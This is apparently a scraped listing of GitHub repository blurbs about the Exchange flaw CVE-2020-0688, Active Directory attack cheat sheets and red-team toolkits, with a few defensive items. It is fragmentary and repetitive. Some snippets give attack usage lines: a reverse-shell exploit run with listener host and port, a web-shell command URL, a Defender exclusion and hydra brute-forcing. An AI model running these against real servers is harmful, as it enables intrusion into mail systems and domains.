CVE-2020-0688

I made this script for conducting CVE-2020-0688 more rapidly. It helps to improve checking the vuln, reducing hugely steps for that

cve-2020-0688 I made this script for conducting CVE-2020-0688 more rapidly It helps to improve checking the vuln, reducing hugely steps for that Modify these inputs before running the file url = "mailsomethingcom" #input 1* command = "cmd /c echo OOOPS!!! > c:/truongtntxt" #input2* aspsession = "1111a11c-11ad-1c11-1111-1111122f5977&

Powershell script helping for domain enumeration - Written while doing the 'Advanced Red Team' lab from pentesteracademy

Invoke-Recon Powershell script as a first step for domain enumeration Tries to spot quickwins Just because i'm tired to type the same AD / PowerView commands over and over Prerequisites You may want to exclude your tools directory from Defender (if you clone submodules for examples): Add-MpPreference -ExclusionPath "C:\Users\bleponge\Documents\myrepos" Get-MpP

Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"

CVE-2020-0688 Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability" Usage: powershell -exec bypass -file \CVE-2020-0688ps1 -xaml <XAML PATH> -uri <default|liveiderror|> Example: This is an example of vulnerability validation by seting header in response powershell -exec bypass

winddows-Active-Directory-Cheatsheet A cheatsheet in order to help during intrusion steps on Windows environment Summary Tools Enumeration Pre auth Find valid users Find valid credentials AS REP Roast Responder Post auth Domain info Powerview Bloodhound Ldeep SPNs Privelege Escalation PowerUp WinPeas FullPower PrintSpoofer Potatoes DNS Admin Abuse Backup Operato

justtest

cve-2020-0688 Usage: usage: cve-2020-0688py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Passwor

cve-2020-0688 Usage: usage: cve-2020-0688py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Passwor

Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys

CVE-2020-0688 A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time Knowledge of a the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM About Vulnerability The bug is found in the Exchange

Scans for Microsoft Exchange Versions with masscan

CVE-2020-0688-Scanner This script scans an IP/range/CIDR and outputs the Microsoft Exchange Servers and Versions discovered The specified IP/range/CIDR will be scanned with masscan on port tcp/443 After a successful scan it tries to HTTP GET "/owa/auth/logonaspx" with curl to grab the Outlook Web Access page source for build versions to display On Small Business S

CVE-2020-0688 - Exchange

python3 CVE-2020-0688py mailchinabaikercom username@domaincom password command

A command line tool to search AttackerKB.

AKB-Explorer A command line tool to search AttackerKB How to install Not much to do, you just have to clone the repo and install the required python libraries git clone githubcom/horshark/akb-explorer/ pip install -r requirementstxt Then you need to add your AKB API key in config/apitxt You can retrive it from your AKB profile echo "YOUR_AKB_API_KEY_HERE&quo

CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"

CVE-2020-0688 Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability" Usage: powershell -exec bypass -file \CVE-2020-0688ps1 -xaml <XAML PATH> -uri <default|liveiderror|> Example: This is an example of vulnerability validation by seting header in response powershell -exec bypass

CVE-2020-0688_EXP Auto trigger payload & encrypt method

CVE-2020-0688_EXP CVE-2020-0688_EXP Auto trigger payload python3 CVE-2020-0688_EXPpy -h usage: CVE-2020-0688_EXPpy [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e] optional arguments: -h, --help show this help message and exit -s SERVER, --server ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PA

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

CVE-2020-0688 PoC

ecp_slap This proof-of-concept for CVE-2020-0688 includes functions for the scanning and exploitation of a vulnerable on-prem Exchange instance Usage scan - provide credentials and target information to obtain cookies required for exploitation and saves them to 'cookiestxt' Also checks for exposure of the Exchange Control Panel (ECP) service for the targeted Excha

PoC RCE Reverse Shell for CVE-2020-0688

CVE-2020-0688 Working Exploit PoC (CVE-2020-0688) - Reverse Bind Shell Tested using Python27 To Install: pip install -r requirementstxt To Run: python CVE-2020-0688-POCpy 1016124 -lhost 10111 -lport 4444

PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell

PSForgot2kEyXCHANGE PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell Usage This PoC requires a valid Username and Password This PoC uses ysoserialnet to create the new ViewState which contains the command you specified on the -Command param If you don't already have this installed on your system download it here PS> \PSForgot2kEyXCHANGEps1 PS&

A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.

Description A tool for generating NET serialized gadgets that can trigger NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA scripts The current gadget triggers a call to ActivatorCreateInstance() when deserialized using BinaryFormatter from jscript/vbscript/vba, this means it can be used to trigger execution of your NET assembly of choice

weaponized tool for CVE-2020-0688

weaponized tool for CVE-2020-0688(Microsoft Exchange 2010 MRMAutoTagModel unsafe deserialize vulnerability) build install net framework 35 first, then make usage CVE-2020-17144 <target> <user> <pass> After exploit, access [target]/ews/soap/?pass=whoami to get command execution And you can also modify ecs as a customize e

A curated list of awesome C-Sharp frameworks, libraries and software.

awesome-c-sharp A curated list of awesome C-Sharp frameworks, libraries and software CodeHubApp/CodeHub - CodeHub is an iOS application written using Xamarin mxgmn/WaveFunctionCollapse - Bitmap & tilemap generation from a single example with the help of ideas from quantum mechanics dotnet-architecture/eShopOnContainers - Cross-platform NET sample microservices and c

General Security Scripts

GeneralSecurityScripts --> Please note, unless mentioned otherwise, all scripts work on both Linux and Windows, and for Python2 or 3 (look at the first line) GetNessusHomeCodepy: Automated registration for new Nessus Home Feed license DownloadNessuspy: Automated script for downloading the most recent Nessus version (Linux version only) rdpstrippy: Automated MitM scri

做redteam时使用，修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration CheetSheets Modified by: z3r0yu Blog: zeroyuxyz Table of Contents 信息搜集 开源情报信息收集（OSINT） github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取 �

2018年初整理的一些内网渗透TIPS，后面更新的慢，所以公开出来希望跟小伙伴们一起更新维护~

Author: Evi1cg Blog: evi1cggithubio Table of Contents 信息搜集 开源情报信息收集（OSINT） github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取 进入内网 基于企业弱账�

做redteam时使用，修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration Tips Modified by: z3r0yu Blog: zeroyuxyz PS: 主要增加的内容是自己在做redteam时候的一些技巧 Table of Contents 信息搜集 开源情报信息收集（OSINT） github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对

A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Es

Powershell tool to automate Active Directory enumeration.

adPEAS adPEAS is a Powershell tool to automate Active Directory enumeration In fact, adPEAS is like a wrapper for different other cool projects like PowerView Empire Bloodhound and some own written lines of code As said, adPEAS is a wrapper for other tools They are almost all written in pure Powershell but some of them are included as compressed binary blob or C# code How

2020年网上阅读过的文章记录

渗透 Seagate Central Storage远程执行代码0天 NSA固件漏洞挖掘 SKF实验室 GraphQL错误，JWT，SSRF，SSTI漏洞环境,可以和githubcom/D0g3-Lab/H1ve漏洞环境结合一起使用 hydra使用 新用法、结合tor代理破解密码 通过滥用文件下载功能中的SQL注入来窃取NTLMv2哈希 通过注入获取NTLMv2 hash值 持久性&nd

Deserialization payload generator for a variety of .NET formatters

A proof-of-concept tool for generating payloads that exploit unsafe NET object deserialization Description ysoserialnet is a collection of utilities and property-oriented programming "gadget chains" discovered in common NET libraries that can, under the right conditions, exploit NET applications performing unsafe deserialization of objects The main driver progra

CS2020 repository MSEL concepts: DMZ # initial access firewall cve (out of scope?) python3 pfsense_auth_226_execpy localhost:65535 nc <IP> # initial access firewall (lockout feature!) web-proxy, ftp, dns, and web-conf proxychains hydra -L ~/userstxt -P ~/passwordstxt <IP> ssh -u -V; # shell to dmz boxes via ssh ssh <USER>@&

Generic assessment template

Pentest Template 1) Setup attacking machine: # NOTE: icmp and udp can't be proxied via proxychains! # setting up, socks, port forwarding for payload delivery ssh -f -N -D <LOCALIP>:<LOCALPORT> root@<REMOTEIP> # from local box socat TCP-LISTEN:<LOCALPORT>,bind=<LOCALIP>,fork,reuseaddr TCP:<RE

Compiled binaries and ready code for Red Teaming

Red Team Binaries Compiled binaries and ready to use code for red teaming *References: githubcom/GhostPack githubcom/rootm0s/WinPwnage githubcom/0xbadjuju/WheresMyImplant githubcom/hfiref0x/UACME githubcom/RhinoSecurityLabs/Aggressor-Scripts pentestmagcom/simpleshellcodeinjector-ssi/ Exploits krbtgtpw/dacl-permis

This is an open source Snort rules repository

SnortRules This is an open source Snort rules repository for exploit and application detection signatures Exploit Rules: CVE-2020-0618 CVE-2020-0688 CVE-2020-1938 CVE-2020-10189 CVE-2020-3952 CVE-2020-5902 CVE-2020-1350 CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)

AD-Pentesting-Tools Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vul

vFeed CVEs Vulnerability Indicators that should be addressed to limit the effectiveness of the Leaked FireEye Red Team tools CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 100 CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 100 CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Forti

CVEs enumerated by FireEye and that should be addressed to limit the effectiveness of leaked the Red Team tools CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 100 CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 100 CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Useful Pentest tool links

Pentest-Tools Red-Team-Essentialss General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vu

红队作战中比较常遇到的一些重点系统漏洞整理。

红队中易被攻击的一些重点系统漏洞整理 一、OA系统 泛微(Weaver-Ecology-OA) 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本70/80/81/90 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) 泛微ecology OA数据库配置信息泄露 泛微OA云桥任意文件读取 - 影响2018-2019 多个版本 泛微 e-cology OA 前台SQL注入漏�

CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15

Middleware-Vulnerability-detection 实时更新较好用最新漏洞EXP，仅供已授权渗透测试使用 2020418项目迎来两位伙伴一起维护 @caizhuang @3ndz Apache --2019 Apache-flink 未授权访问任意 --2019 CVE-2019-0193 Apache-Solr via Velocity template RCE --20203 CVE-2019-17564 Apache-Dubbo反序列化漏洞 --2

Middleware-Vulnerability-detection 实时更新较好用最新漏洞EXP，仅供已授权渗透测试使用 2020418项目迎来两位伙伴一起维护 @caizhuang @3ndz Apache --2019 Apache-flink 未授权访问任意 --2019 CVE-2019-0193 Apache-Solr via Velocity template RCE --20203 CVE-2019-17564 Apache-Dubbo反序列化漏洞 --

红方人员作战执行手册

红方人员实战手册 声明 Author : By klion Date : 2020215 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

红方人员作战执行手册

红方人员实战手册 声明 Author : By klion Date : 2020215 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备

公开收集所用

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

信息收集 主机信息收集 敏感目录文件收集 目录爆破 字典 BurpSuite 搜索引擎语法 Google Hack DuckDuckgo 可搜索微博、人人网等屏蔽了主流搜索引擎的网站 Bing js文件泄漏后台或接口信息 快捷搜索第三方资源 findjs robotstxt 目录可访问（ autoindex ） iis短文件名 IIS-ShortName-Scanner

渗透测试有关的POC、EXP、脚本、提权、小工具等，欢迎补充、完善---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

PoC in GitHub 2020 CVE-2020-0014 It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable This could lead to a local escalation of privilege with no additional execution privileges needed User action is needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Android-10Android ID: A-1286745

PoC in GitHub 2020 CVE-2020-0014 (2020-02-13) It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable This could lead to a local escalation of privilege with no additional execution privileges needed User action is needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Android-10Android

PoC auto collect from GitHub.

PoC in GitHub 2020 CVE-2020-0022 In reassemble_and_dispatch of packet_fragmentercc, there is possible out of bounds write due to an incorrect bounds calculation This could lead to remote code execution over Bluetooth with no additional execution privileges needed User interaction is not needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Andr

Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out current Contents CVE-2011-2856 CVE-2011-3243 CVE-2013-2618 CVE-2013-6632 CVE-2014-1701 CVE-2014-1705 CVE-2014-1747 CVE-2014-3176 CVE-2014-6332 CVE-2014-7927 CVE-2014-7928 CVE-2015-0072 CVE-2015-0235 CVE-2015-0240 CVE-2015-1233 CVE-2015-1242 CVE-2015-1268 CV

Awesome CVE PoC A curated list of CVE PoCs Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out awesome-web-security Please read the contribution guidelines before contributing This repo is full of PoCs for CVEs If you enjoy this awesome list and would like to support it, check out my Patreon page :